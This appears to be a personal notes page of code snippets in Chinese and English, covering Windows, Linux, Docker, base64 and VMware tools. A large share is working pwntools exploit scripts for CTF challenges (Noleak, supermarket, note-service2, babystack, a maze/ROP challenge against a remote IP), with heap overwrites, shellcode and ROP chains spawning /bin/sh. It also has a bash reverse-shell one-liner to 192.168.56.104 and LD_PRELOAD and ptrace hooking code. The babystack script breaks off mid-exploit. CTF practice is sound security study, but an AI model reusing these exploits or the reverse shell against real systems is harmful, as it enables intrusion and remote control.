#include <Windows.h>
#include <stdio.h>

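int main() {
    // Wait for a left-button click, make the window under the cursor layered
    // with alpha 225/255, then ask whether to keep the change and revert the
    // extended style if not. Returns 0.
    POINT curpos;
    HWND handle = NULL;
    int mb_ok;
    LONG Wlong;

    while(1)
    {
        if(GetAsyncKeyState(VK_LBUTTON) & 0x8000){
            GetCursorPos(&curpos);
            handle = WindowFromPoint(curpos);
            printf("0x%p\n", (void*)handle);   // %x truncated the 64-bit HWND
            Wlong = GetWindowLongW(handle, GWL_EXSTYLE);
            // 0x80000 in the original is WS_EX_LAYERED; the W variants are used
            // consistently so the get/set pair matches.
            SetWindowLongW(handle, GWL_EXSTYLE, Wlong | WS_EX_LAYERED);
            SetLayeredWindowAttributes(handle, 0, 225, LWA_ALPHA);
            mb_ok = MessageBoxA(NULL, "Is it necessary to change?", "Sir", MB_OKCANCEL);
            if(mb_ok != IDOK){
                SetWindowLongW(handle, GWL_EXSTYLE, Wlong);   // restore the saved style
            }
            break;
        }
        Sleep(10);   // poll instead of spinning a core while waiting for the click
    }
    return 0;
}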

C#

dotnet new console --output sample1
dotnet run --project sample1

runc启动一个容器

将一个docker image文件解压,然后打包成tar:

docker run --rm -d --name ubuntu ubuntu:18.04 tail -f /dev/null
docker export ubuntu > rootfs.tar
docker kill ubuntu

将tar文件解压后制作成容器所需的Filesystem bundle, 然后用 `runc spec` 命令获得设置文件(config.json):

mkdir -p bundle/rootfs
tar xf rootfs.tar -C bundle/rootfs
 runc spec -b bundle

运行runc run,Filesystem bundle作为参数,启动容器:

runc run --bundle bundle demo1

反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.56.104/1234 0>&1'

启用Windows Dump功能

OpenDump.bat

@echo off
rem Enable Windows Error Reporting "LocalDumps" for all processes:
rem   DumpFolder  - where dumps are written (C:\CrashDump)
rem   DumpType 2  - full user-mode dumps
rem   DumpCount   - keep at most 10 dump files
rem The keys live under HKLM, so run this from an elevated prompt.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps" /v DumpFolder /t REG_EXPAND_SZ /d "C:\CrashDump" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps" /v DumpType /t REG_DWORD /d 2 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps" /v DumpCount /t REG_DWORD /d 10 /f
pause
@echo on

Linux内联汇编

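unsigned long int uid = 0;
/* Read the 8-byte word at offset 0x28 of the block that %fs points to
 * (x86-64, GNU inline asm). On glibc x86-64 that slot holds the
 * stack-protector guard, so "uid" is a misnomer kept for compatibility;
 * confirm the meaning for the libc in use.
 * Fixes vs. the original: the closing ");" was inside the trailing comment,
 * leaving the statement unterminated; rdi is a scratch register and must be
 * declared clobbered; "volatile" keeps the read from being hoisted or dropped. */
__asm__ volatile("mov %%fs:0x0,%%rdi\n\t"
                 "mov 0x28(%%rdi),%%rdx\n\t"
                 : "=d"(uid)            /* outputs: rdx -> uid */
                 :                      /* inputs: none */
                 : "rdi", "memory");    /* registers modified */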
限定符意义
“m”、”v”、”o”内存单元
“r”任何寄存器
“q”寄存器 eax、ebx、ecx、edx 之一
“i”、”h”直接操作数
“E”和”F”浮点数
“g”任意
“a”、”b”、”c”、”d”分别表示寄存器 eax、ebx、ecx 和 edx
“S”和”D”寄存器 esi、edi
“I”常数(0 至 31)

自定义base64

# 自定义字典
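# 自定义字典 — custom alphabet: positions 12..37 are swapped between upper and lower case
base64_list = "abcdefghijklMNOPQRSTUVWXYZABCDEFGHIJKLmnopqrstuvwxyz0123456789+/"

def base64Encode(string):
    """Base64-encode a str with the custom alphabet in base64_list.

    Each character's code point is rendered as (at least) 8 bits, so only
    code points below 256 produce valid output, as in the original. The bit
    stream is cut into 6-bit groups (the last group right-padded with zeros),
    each group indexes base64_list, and '=' padding brings the length to a
    multiple of 4. Returns '' for ''.
    """
    # 一共要八位不够补零 — every character becomes an 8-bit zero-padded string
    bit_stream = "".join("{:08b}".format(ord(ch)) for ch in string)

    # 通过切片将每6位合并 — left-align each 6-bit slice, zero-fill the short tail
    six_bit_groups = ["{:<06}".format(bit_stream[i:i + 6]) for i in range(0, len(bit_stream), 6)]

    # 每六位换成十进制索引到b64列表 — map each group through the alphabet
    result = "".join(base64_list[int(group, 2)] for group in six_bit_groups)

    # 假如结果不是4的倍数用等号补齐 — pad to a multiple of 4
    if len(result) % 4 == 2:
        result += "=="
    elif len(result) % 4 == 3:
        result += "="
    return result

def base64Decode(string):
    """Decode a string produced by base64Encode back to str.

    Strips '=' padding, maps each symbol to its 6-bit index, re-joins the bit
    stream and consumes it 8 bits at a time. A trailing group shorter than 8
    bits is encoder padding and is dropped; a full trailing byte is kept.
    (The original always dropped the last group, which lost the final byte of
    every input whose length is a multiple of 3.)
    Raises ValueError for a symbol that is not in base64_list.
    """
    symbols = string.strip("=")

    # 还原出6位二进制列表 — right-align each index as 6 bits
    bit_stream = "".join("{:>06}".format(bin(base64_list.index(ch))[2:]) for ch in symbols)

    # 还原出到8位2进制值的字符串列表, 根据ascii值得出原字符
    chars = []
    for i in range(0, len(bit_stream), 8):
        group = bit_stream[i:i + 8]
        if len(group) == 8:
            chars.append(chr(int(group, 2)))
    return "".join(chars)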

data = "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"
# Encode the reversed input, then decode a fixed sample with the custom alphabet.
reversed_data = data[::-1]
print(base64Encode(reversed_data))
print(base64Decode("ZmxHZ3teMf95MfVFS24xD19fBmNyWXa3AW9uFQ=="))

Linux更新内核后VM虚拟机不可用

修复脚本:

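#!/bin/bash
# Rebuild the VMware host kernel modules from mkubecek's out-of-tree repository
# after a kernel update, replace VMware's bundled libz with the system one, and
# restart the VMware services.
#
# set -e: abort on the first failing step. Without it a failed `cd` left the
# later `rm`/`sudo` commands running in whatever directory the script was
# started from. Variables are quoted so paths with spaces are handled.
set -euo pipefail

VMWARE_VERSION=workstation-15.5.6   # branch in the repo; find yours with `vmware-installer -l`
TMP_FOLDER=/tmp/patch-vmware

rm -rf "$TMP_FOLDER"
mkdir -p "$TMP_FOLDER"
cd "$TMP_FOLDER"
git clone https://github.com/mkubecek/vmware-host-modules.git
cd "$TMP_FOLDER/vmware-host-modules"
git checkout "$VMWARE_VERSION"
git fetch
make
sudo make install
# -f: a missing bundled libz must not abort the script before the symlink is created.
sudo rm -f /usr/lib/vmware/lib/libz.so.1/libz.so.1
sudo ln -s /lib/x86_64-linux-gnu/libz.so.1 /usr/lib/vmware/lib/libz.so.1/libz.so.1
sudo /etc/init.d/vmware restart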

VMWARE_VERSION查看方式:

vmware-installer -l

A* search

from ptrlib import *
import heapq
class Maze(object):
    """One A* search node: the grid plus player position, path cost and moves so far.

    Cells are ints indexing MAZE_OBJ: 0 floor, 1 wall, 2 finish, 3 '?'.
    The finish cell (value 2) is located on construction and cached in
    fx/fy; a grid without a 2 leaves those attributes unset.
    """
    MAZE_OBJ = [" ", "#", "F", "?"]
    # (dx, dy, key) in the exact order successors are generated: left, right, up, down.
    _MOVES = ((-1, 0, "a"), (1, 0, "d"), (0, -1, "w"), (0, 1, "s"))

    def __init__(self, maze, px, py, step=0, move=""):
        self.px = px
        self.py = py
        self.maze = maze
        self.step = step
        self.move = move
        for row_idx, row in enumerate(self.maze):
            for col_idx, cell in enumerate(row):
                if cell == 2:
                    self.fx, self.fy = col_idx, row_idx

    def h(self):
        """Manhattan distance from the player to the finish."""
        return abs(self.px - self.fx) + abs(self.py - self.fy)

    def f(self):
        """A* priority: steps taken so far plus the heuristic."""
        return self.step + self.h()

    def goal(self):
        """True when the player stands on the finish cell."""
        return (self.px, self.py) == (self.fx, self.fy)

    def gen_next(self):
        """Successor nodes for every neighbour that is floor (0) or finish (2).

        Indexing is unchecked, so a negative index wraps like any Python list.
        """
        successors = []
        for dx, dy, key in self._MOVES:
            nx, ny = self.px + dx, self.py + dy
            if self.maze[ny][nx] in (0, 2):
                successors.append(Maze(self.maze, nx, ny, self.step + 1, self.move + key))
        return successors

    def __lt__(self, other):
        # heapq ordering: lower f() is popped first.
        return self.f() < other.f()

    def __str__(self):
        lines = []
        for row_idx, row in enumerate(self.maze):
            chars = [
                'P' if (col_idx, row_idx) == (self.px, self.py) else self.MAZE_OBJ[cell]
                for col_idx, cell in enumerate(row)
            ]
            lines.append(''.join(chars))
        return '\n'.join(lines).strip()

    def __hash__(self):
        # Position only: nodes reaching the same cell are treated as the same state.
        return hash((self.px, self.py))
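class MazeRobot(object):
    """A* driver over Maze nodes."""

    def __init__(self, maze, px, py):
        self.initial_map = Maze(maze, px, py)

    def solve(self):
        """Run A* from initial_map and return the key sequence of the goal node.

        If the frontier empties before a goal is popped, the moves of the last
        node examined are returned (unchanged from the original). Visited
        positions are kept in a set; the original used a list, making each
        membership test O(n).
        """
        frontier = [self.initial_map]
        seen = set()
        maze = self.initial_map
        while frontier:
            maze = heapq.heappop(frontier)
            if hash(maze) in seen:
                continue
            seen.add(hash(maze))
            if maze.goal():
                break
            for next_maze in maze.gen_next():
                heapq.heappush(frontier, next_maze)
        return maze.move

    def __str__(self):
        return str(self.initial_map)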
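def solve_level():
    """Read one level from the server and return the key sequence that solves it.

    The first line contains "is level N"; N + 5 grid lines follow. Each cell is
    a UTF-8 symbol: E2 AC 9B -> wall (1), E2 AC 9C -> floor (0),
    F0 9F 9A .. -> finish (2; a 4-byte sequence, hence the extra skip);
    any other symbol is the player, recorded in px/py and stored as -1.
    Depends on the module globals sock and logger. The unused `buf` local
    of the original is dropped.
    """
    r = sock.recvline()
    level = int(r[r.index(b"is level ") + 9:])
    logger.info("Solving level {}".format(level))
    # Load field
    maze = []
    px, py = -1, -1
    for _ in range(5 + level):
        row = []
        maze.append(row)
        line = sock.recvline()
        #print(line.decode())
        i = 0
        while i < len(line):
            cell = -1
            block = line[i:i+3]
            if block == b'\xe2\xac\x9b':
                cell = 1
            elif block == b'\xe2\xac\x9c':
                cell = 0
            elif block == b'\xf0\x9f\x9a':
                cell = 2
                i += 1
            else:
                px, py = len(row), len(maze) - 1
                i += 1
            i += 3
            row.append(cell)
    # Solve
    robot = MazeRobot(maze, px, py)
    return robot.solve()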
#"""
#sock = Socket("localhost", 9999)
# Interaction with the challenge instance: the stack layout sizes, the 0x1192eb
# base offset and the gadget offsets below are tied to the pwn.packed build
# used there and are not parameters.
sock = Socket("170.106.35.18", 62176)
for i in range(100):
    move = solve_level()
    sock.sendline(move)
    print(move)
#"""
#sock = Socket("localhost", 9999)
#sock = Process("./pwn.packed")
# leak proc base
payload  = b'A' * (14 * 8)
payload += p64(0xc00003dd20)
payload += p64(0x40) * 2
payload += b'A' * (17 * 8)
payload += b'\xce'
sock.sendlineafter("name:\n", payload)
r = sock.recvregex("is : (.+)\.")
print(r)
proc_base = u64(r[0][:8]) - 0x1192eb
logger.info("proc = " + hex(proc_base))
if proc_base < 0:
    logger.warn("Bad luck!")
    exit(1)
# get the shell
rop_syscall = proc_base + 0x000cfe79
rop_pop_rdi = proc_base + 0x00109d3d
rop_pop_rax = proc_base + 0x00074e29
rop_pop_rsi_r15 = proc_base + 0x00119c45
rop_pop_rdx_adc_al_f6 = proc_base + 0x00079e6e
payload  = b'A' * (15 * 8)
payload += p64(0x0) * 2
payload += b'A' * (16 * 8)
payload += b'/bin/sh\0'
payload += p64(rop_pop_rdx_adc_al_f6)
payload += p64(0)
payload += p64(rop_pop_rdi)
payload += p64(0xc00003de80)
payload += p64(rop_pop_rsi_r15)
payload += p64(0)
payload += p64(0xdeadbeef)
payload += p64(rop_pop_rax)
payload += p64(59)
payload += p64(rop_syscall)
sock.sendlineafter("name:\n", payload)
sock.interactive()

Frida

from pwn import *
import frida
import sys
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']

# Address text captured by PrintMessage from the Frida script's send() payloads;
# both are int()-parsed as hex after script.load().
system_addr = ""
proc_addr = ""
def PrintMessage(message,data):
	"""Frida message handler.

	A "send" message whose payload mentions "system" or "pro_addr" has the
	last 14 characters of the payload (the address text) stored in the module
	globals system_addr / proc_addr, and the payload is echoed. An "error"
	message is printed field by field (tabs in string fields expanded to four
	spaces); any other message is printed as-is. Returns None.
	"""
	msg_type = message["type"]
	if msg_type == "send":
		global system_addr
		global proc_addr
		payload = message["payload"]
		if "system" in payload:
			system_addr = payload[-14::]
		if "pro_addr" in payload:
			proc_addr = payload[-14::]
		print("[*] var {0}".format(payload))
	elif msg_type == 'error':
		for field in message:
			if field == 'type':
				print('[*] %s' % 'error:')
				continue
			value = message[field]
			if isinstance(value, str):
				print('[*] %s' % field + ':\n\t{0}'.format(value.replace('\t', '    ')))
			else:
				print('[*] %s' % field + ':\n\t{0}'.format(value))
	else:
		print(message)

# Frida agent: reports the base of the "re" module and the address of libc's
# system export back to PrintMessage via send().
jscode = '''
	var pro_addr = Module.findBaseAddress('re');
	send("pro_addr: " + pro_addr);
	var exports = Module.enumerateExportsSync("/lib/x86_64-linux-gnu/libc.so.6");
    for(var i=0;i<exports.length;i++){
		if(exports[i].name == "system"){
			send("name: "+exports[i].name+"  address: "+exports[i].address);
		}
    }
'''
# Start ./re under pwntools, attach Frida to it, and run the agent; the
# handler fills system_addr/proc_addr synchronously during script.load().
p_pwn = process("./re")
p = frida.attach("re")
script = p.create_script(jscode)
script.on('message',PrintMessage)
script.load()
system_addr = int(system_addr,16)
proc_addr = int(proc_addr,16)
print("system_addr: " + hex(system_addr))
print("proc_addr: " + hex(proc_addr))

# Offsets 0x753/0x774 are specific to this build of ./re.
pay = b"a"*24 + p64(proc_addr + 0x753) + p64(proc_addr +0x774) + p64(system_addr)
#sys.stdin.read()
p_pwn.sendline(pay)
p_pwn.interactive()

# Unused string literal: a hexdump variant of the agent kept from the original.
'''
	var pro_addr = Module.findBaseAddress('re');
	send("pro_addr: " + pro_addr);
	console.log(hexdump(pro_addr, {
		offset: 743,
		length: 750,
		header: true,
		ansi: true
}));
'''

LKM Makefile

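KVERS = $(shell uname -r)
# Kernel modules name
obj-m += file_name.o
# Many file.c
#modulename-objs := file1.o file2.o
# Specify flags for the module compilation.
#EXTRA_CFLAGS=-g -O0

# Out-of-tree build against the headers of the running kernel.
# $(MAKE) rather than a bare `make` so the parent's flags and jobserver
# propagate to the sub-make; the targets are phony since they create no
# file of their own name.
.PHONY: build kernel_modules clean
build: kernel_modules
kernel_modules:
	$(MAKE) -C /lib/modules/$(KVERS)/build M=$(CURDIR) modules
clean:
	$(MAKE) -C /lib/modules/$(KVERS)/build M=$(CURDIR) clean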

Linux Hook

//main.c
#include <stdio.h>
#include <string.h>

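int main(int argc, char *argv[])
{
    /* Compare argv[1] with the expected password and report the outcome.
     * Returns 1 with a usage line when no argument is given (the original
     * passed argv[1] == NULL to strcmp in that case), else 0. */
    if (argc < 2)
    {
        printf("Usage: %s <password>\n", argv[0]);
        return 1;
    }
    if( strcmp(argv[1], "test") )
    {
        printf("Incorrect password\n");
    }
    else
    {
        printf("Correct password\n");
    }
    return 0;
}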
//hook.c
#include <stdio.h>
#include <string.h>
#include <dlfcn.h>
/*
 * The hook target is strcmp, so STRCMP is the matching function-pointer type.
 * The aim is to control the function's behaviour: the real strcmp is fetched
 * from libc.so.6 and kept in old_strcmp so that it could be called.
 */
typedef int(*STRCMP)(const char*, const char*);

/* Replacement strcmp injected with LD_PRELOAD (see the commands below):
 * prints both arguments and reports "equal" (0) unconditionally. old_strcmp
 * is resolved once but never called, so the real comparison is not consulted.
 * NOTE(review): dlopen/dlsym results are unchecked and the handle is never
 * released with dlclose. */
int strcmp(const char *s1, const char *s2)
{
    static void *handle = NULL;        /* libc handle, resolved on the first call */
    static STRCMP old_strcmp = NULL;   /* real strcmp; currently unused */

    if( !handle )
    {
        handle = dlopen("libc.so.6", RTLD_LAZY);
        old_strcmp = (STRCMP)dlsym(handle, "strcmp");
    }
    printf("oops!!! hack function invoked. s1=<%s> s2=<%s>\n", s1, s2);
    return 0;
}
gcc -o test main.c
gcc -fPIC -shared -o hook.so hook.c -ldl
LD_PRELOAD=./hook.so ./test 123
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h> 
#include <unistd.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/reg.h>   /* For constants ORIG_EAX etc */
#include <sys/user.h>

/* Marker routine: prints one fixed line (puts appends the newline). */
void new_show()
{
    puts("Hooked by cc-sir!");
}

int main(int argc, char *argv[])
{
    /*
     * Attach to the process given as argv[1] with ptrace, overwrite the word
     * at its current rip with breakpoint bytes, let it run into the trap, then
     * restore the original word and registers and detach.
     * Returns 1 on bad usage, 0 otherwise (including after a failed poke).
     */
    if(argc!=2) {
        printf("Usage: %s pid\n", argv[0]);
        return 1;
    }
    struct user_regs_struct reg;
    pid_t pid = atoi(argv[1]);
    ptrace(PTRACE_ATTACH, pid,NULL,NULL);   /* NOTE(review): return value unchecked */
    wait(NULL);
    ptrace(PTRACE_GETREGS,pid,NULL,&reg);   /* registers at the stop; restored verbatim below */
    printf("rip: 0x%lx\n",reg.rip);
    long addr = reg.rip;
    long show_addr = 0x400586;   /* unused */
    long code = 0xcc80cd;        /* bytes cd 80 cc; POKETEXT writes a whole long, so the
                                    five bytes after them at addr are zeroed until restored */
    long back_code;
    int id;                      /* unused */
    back_code = ptrace(PTRACE_PEEKTEXT, pid, addr, NULL);   /* save the original word */
    printf("back_code: %llx\n",back_code);   /* NOTE(review): %llx with a long; %lx matches */

    if(ptrace(PTRACE_POKETEXT, pid, addr, code) < 0){   /* patch in the breakpoint bytes */
        perror("PTRACE_POKETEXT");
        return 0;
    }
    ptrace(PTRACE_CONT, pid, NULL, NULL);
    wait(NULL);   /* returns once the tracee stops on the trap (or for any other reason) */
    printf("The process has int 0x3!\n");
    getchar();
    if(ptrace(PTRACE_POKETEXT, pid, addr, back_code) < 0){  /* restore the original word */
        perror("PTRACE_POKETEXT");
        return 0;
    }
    ptrace(PTRACE_SETREGS, pid, NULL, &reg); /* restore registers captured before the patch (rip back at addr) */
    ptrace(PTRACE_CONT, pid, NULL, NULL);
    printf("The process has continue run!\n");
    ptrace(PTRACE_DETACH, pid, NULL, NULL);
    return 0;
}

linux对apk签名

keytool -genkey -v -alias KeyName -keyalg RSA -keysize 2048 -validity 10000 -keystore KeyFileName.keystore

jarsigner -verbose -keystore KeyFileName.keystore apk_file.apk KeyName

Linux 编译libc.so

libc: sir.c:

/* Return a + b as a plain int (signed overflow is the caller's responsibility). */
int add(int a, int b){
    int sum = a;
    sum += b;
    return sum;
}

编译:

gcc -fPIC -shared -o libsir.so sir.c

调用:
sir.h

#ifndef __SIR_H__
#define __SIR_H__
int add(int n1, int n2);
#endif

test.c:

#include<stdio.h>
#include"sir.h"
int main(){
    /* Call add() from libsir.so (declared in sir.h) and print the sum. */
    printf("%d\n", add(6,4));
    return 0;
}

编译

gcc test.c -o test -L ./ -lsir

运行:

LD_LIBRARY_PATH=./ ./test

字符串画图片

from PIL import Image, ImageDraw, ImageFont

font_size = 12                                     # grid pitch in pixels: one glyph per font_size x font_size cell
text = "xxxx!"                                     # characters cycled across the image
img_path = "/home/cc-sir/desktop/xx.jpg"

img_raw = Image.open(img_path)
img_array = img_raw.load()                         # pixel access; img_array[x, y] supplies each glyph's colour

img_new = Image.new("RGB", img_raw.size, (0, 0, 0))   # black canvas of the source size
draw = ImageDraw.Draw(img_new)
font = ImageFont.truetype('/home/cc-sir/desktop/msyh.ttc', font_size)

def character_generator(text):
    """Yield the characters of ``text`` forever, wrapping around at the end.

    Never terminates; with empty ``text`` the loop spins without yielding.
    """
    while True:
        for ch in text:
            yield ch

ch_gen = character_generator(text)

# Walk the source image one cell at a time; each cell receives the next
# character of the cycled text, coloured with the source pixel at that spot.
rows = range(0, img_raw.size[1], font_size)
cols = range(0, img_raw.size[0], font_size)
for row in rows:
    for col in cols:
        pixel = img_array[col, row]
        draw.text((col, row), next(ch_gen), font=font, fill=pixel, direction=None)

img_new.convert('RGB').save("/home/cc-sir/desktop/hh.jpeg")

攻防世界

Noleak

部分地址覆盖爆破:

# -*- coding: utf-8 -*-
from pwn import *

#context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']

# Local binary by default; the commented remote() line is the challenge server.
name = "./timu"
p = process(name)
#p = remote("111.198.29.45",31616)
elf = ELF(name)
#libc=ELF('/usr/lib/i386-linux-gnu/libc-2.24.so')
#libc=ELF('./libc.so.6')
# Passing `G` on the command line (pwntools args) attaches gdb to the process.
if args.G:
    gdb.attach(p)

def add(s,data):
    """Menu option 1 of the target: answer the size prompt with ``s`` and the
    data prompt with ``data`` (raw ``send``, no newline), via the module tube ``p``."""
    for prompt, reply in (("Your choice :", "1"), ("Size: ", s)):
        p.recvuntil(prompt)
        p.sendline(reply)
    p.recvuntil("Data: ")
    p.send(data)

def delete(i):
    """Menu option 2 of the target: send index ``i`` after the 'Index: ' prompt."""
    steps = (("Your choice :", "2"), ("Index: ", i))
    for prompt, reply in steps:
        p.recvuntil(prompt)
        p.sendline(reply)


def update(i,s,data):
    """Menu option 3 of the target: select index ``i``, give size ``s`` and
    then write ``data`` with a raw ``send`` (no trailing newline)."""
    for prompt, reply in (("Your choice :", "3"), ("Index: ", i), ("Size: ", s)):
        p.recvuntil(prompt)
        p.sendline(reply)
    p.recvuntil("Data: ")
    p.send(data)

# Raw x86-64 shellcode bytes (Python 2 str); stored into note 6 further down.
# The whole script is Python 2: the payloads mix str and bytes, which Python 3
# rejects.
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"


# The trailing "#n" comments are the note indices the add() calls produce.
add("180",b"1"*16*6 + p64(0) + p64(0x41)) #0
add("100","2"*8) #1
add("100","3"*8) #2
add("100","4"*8) #3
add("100","5"*8) #4

#delete("0")
delete("2")
delete("3")
# Addresses such as 0x600ff5 are fixed for this non-PIE binary.
update("3","100",p64(0x600ff5))

add("100","6"*8) #5
add("100","7"*59 + "\x00") #6
update("0","100",p64(0) + b"\x71")
update("6","100","7"*59 + "\x10")
delete("0")

update("6","100","7"*59 + "\x00")
update("0","100",p64(0) + b"\xc1")
update("6","100","7"*59 + "\x10")
delete("0")

# malloc_hook = 0x9aed
update("6","100","7"*59 + "\x00")
update("0","100",p64(0) + b"\x71")
update("6","100",shellcode + "7"*(59-len(shellcode)) + "\x10")

# Only the low 16 bits are written (p16), which is the "partial overwrite"
# the section heading refers to; the high nibble is guessed, so this run may
# need to be repeated.
update("0","100",p16(0x6aed))
add("100","sir")
add("100",b"8"*19 + p64(0x600ff5+0x10))

# One more allocation request, then hand the tube to the user.
p.recvuntil("Your choice :")
p.sendline("1")
p.recvuntil("Size: ")
p.sendline("1")
p.interactive()

supermarket

漏洞在于realloc, 当重新分配的new_size < pre_size, 返回原指针; new_size > pre_size释放原指针, 重新分配内存.
可以用堆覆盖,大堆编辑其中的小堆:

# -*- coding: utf-8 -*-
from pwn import *

context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']

# Local binary by default; the commented remote() line is the challenge server.
name = "./supermarket"
p = process(name)
#p = remote("111.198.29.45",38460)
elf = ELF(name)
#libc=ELF('/usr/lib/i386-linux-gnu/libc-2.24.so')
# The libc shipped with the challenge; symbol offsets below come from it.
libc=ELF('./libc.so.6')
if args.G:
    gdb.attach(p)
#   Bug is in realloc: when new_size < pre_size the original pointer is returned; when new_size > pre_size the original pointer is freed and a new block is allocated.

def add(name,size,description):
    """Menu option 1: add an item ``name`` whose description buffer is
    ``size`` bytes and whose content is ``description``; price is always "100".
    Every answer is a sendline on the module tube ``p``."""
    replies = (("your choice>> ", "1"),
               ("name:", name),
               ("price:", "100"),
               ("descrip_size:", str(size)),
               ("description:", description))
    for prompt, reply in replies:
        p.recvuntil(prompt)
        p.sendline(reply)

def change(name,size,description):
    """Menu option 5: resize the description of item ``name`` to ``size`` and
    send ``description`` as its new content (module tube ``p``)."""
    replies = (("your choice>> ", "5"),
               ("name:", name),
               ("descrip_size:", str(size)),
               ("description:", description))
    for prompt, reply in replies:
        p.recvuntil(prompt)
        p.sendline(reply)

def show():
    """Menu option 3: ask for the item listing; the output is left in the tube
    for the caller to parse."""
    prompt, choice = "your choice>> ", "3"
    p.recvuntil(prompt)
    p.sendline(choice)

# 0x08048864
# Three items; 'bbbb' is then grown, which (see the realloc note above) moves
# its description buffer, and 'dddd' is created afterwards.
add('aaaa',0x20,"1111")
add('bbbb',0x80,"2222")
add('cccc',0x20,"3333")

change("bbbb",0xb0,"q")
add("dddd",0x50,'4444')

# 0x804b048 and the 0x64 / 0x50 fields are binary-specific values (non-PIE).
pay =  b"dddd\x00" + b'q'*11 + p32(0x64) + p32(0x50) + p32(0x804b048)
change("bbbb",0x80,pay)

# Read the 4-byte address printed after "dddd: price.100, des." and derive the
# libc base from the atoi symbol of the shipped libc.
show()
p.recvuntil("dddd: price.100, des.")
atoi_addr = u32(p.recv(4))
libc_addr = atoi_addr - libc.symbols['atoi']
system_addr = libc_addr + libc.symbols['system']
success("atoi_addr: " + hex(atoi_addr))

pay1 = p32(system_addr)
change("dddd",0x50,pay1)
p.recvuntil("your choice>> ")
p.sendline("/bin/sh")

p.interactive()

note-service2

# -*- coding: utf-8 -*-
from pwn import *

context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']

# Local binary by default; the commented remote() line is the challenge server.
name = "./pwn"
p = process(name)
#p = remote("111.198.29.45",54704)
elf = ELF(name)
# libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# libc=ELF('./pwn')
if args.G:
    gdb.attach(p)


def add(i,data):
    """Menu option 1: create note ``i`` with a fixed size of 8 and write
    ``data`` into it with a raw ``send`` (module tube ``p``)."""
    for prompt, reply in (("your choice>> ", "1"), ("index:", str(i)), ("size:", '8')):
        p.recvuntil(prompt)
        p.sendline(reply)
    p.recvuntil("content:")
    p.send(data)

def delete(i):
    """Menu option 4: delete note ``i`` (module tube ``p``)."""
    steps = (("your choice>> ", "4"), ("index:", str(i)))
    for prompt, reply in steps:
        p.recvuntil(prompt)
        p.sendline(reply)

# Each 8-byte note holds one short instruction padded with nops and ending in
# \xeb\x19 (presumably a short jump that chains to the next note); the last
# note holds the syscall itself.  Python 2: asm() output and b'' mix freely.
add(0,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
add(1,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
add(2,asm('mov eax,0x3b') + b'\xeb\x19')
add(3,asm('xor rsi,rsi') + b'\x90\x90\xeb\x19')
add(4,asm('xor rdx,rdx') + b'\x90\x90\xeb\x19')
add(5,asm('syscall') + b'\x90'*5)

# A negative index (-8) is accepted by the target without a bounds check.
delete(0)
add(-8,asm('xor rax,rax') + b'\x90\x90\xeb\x19')

p.recvuntil("your choice>> ")
p.sendline("/bin/sh")

p.interactive()

Python base64替换密码表

import base64
import string
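def decode_custom_base64(data, alphabet, standard='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'):
    """Decode base64 text that was encoded with a shuffled 64-character alphabet.

    ``alphabet`` lists the custom symbols in the order of their 6-bit values;
    each is mapped back to the same position of ``standard`` before the normal
    decoder runs.  Characters not in ``alphabet`` (e.g. '=' padding) are left
    untouched.  Returns the decoded bytes.  Works on Python 2 and 3 -- the
    original relied on ``string.maketrans``, which Python 3 removed.
    """
    table = dict(zip(alphabet, standard))
    translated = ''.join(table.get(ch, ch) for ch in data)
    return base64.b64decode(translated)


x = "5rFf7E2K6rqN7Hpiyush7E6S5fJg6rsi5NBf6NGT5rs="
# Custom alphabet recovered from the challenge binary, in 6-bit value order.
base_now = ['v', 'w', 'x', 'r', 's', 't', 'u', 'o', 'p', 'q', '3', '4', '5', '6', '7', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'y', 'z', '0', '1', '2', 'P', 'Q', 'R', 'S', 'T', 'K', 'L', 'M', 'N', 'O', 'Z', 'a', 'b', 'c', 'd', 'U', 'V', 'W', 'X', 'Y', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', '8', '9', '+', '/']
base_now_str = ''.join(base_now)
# Both alphabets must have exactly 64 symbols; the lengths are printed as a check.
print(len(base_now_str))
base_original_str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
print(len(base_original_str))
flag = decode_custom_base64(x, base_now_str, base_original_str)
print(flag)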

babystack

# -*- coding: utf-8 -*-
from pwn import *

context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']

name = "./pwn"
p = process(name)
elf = ELF(name)
# libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# The challenge libc (2.27); the hard-coded offsets below are tied to it.
libc=ELF('./babystack/libc-2.27.so')
if args.G:
    gdb.attach(p)

# Round 1: a 137-byte name with a known 'bbbb' marker; the bytes echoed after
# the marker contain the 7 non-zero canary bytes and a code address from which
# the binary base is derived (0x910 is binary-specific).  Python 2 str/bytes.
p.recvuntil("What's your name: ")
pay = "a" * 133 + 'b'*4
p.send(pay)
p.recvuntil("bbbb")
cannary = u64('\x00' + p.recv(7))
core_starr = u64(p.recv(6) + '\x00\x00') - 0x910
success("canary: " + hex(cannary))
success("core_starr: " + hex(core_starr))

pop_rdi = core_starr + 0x973 #pop rdi; ret;

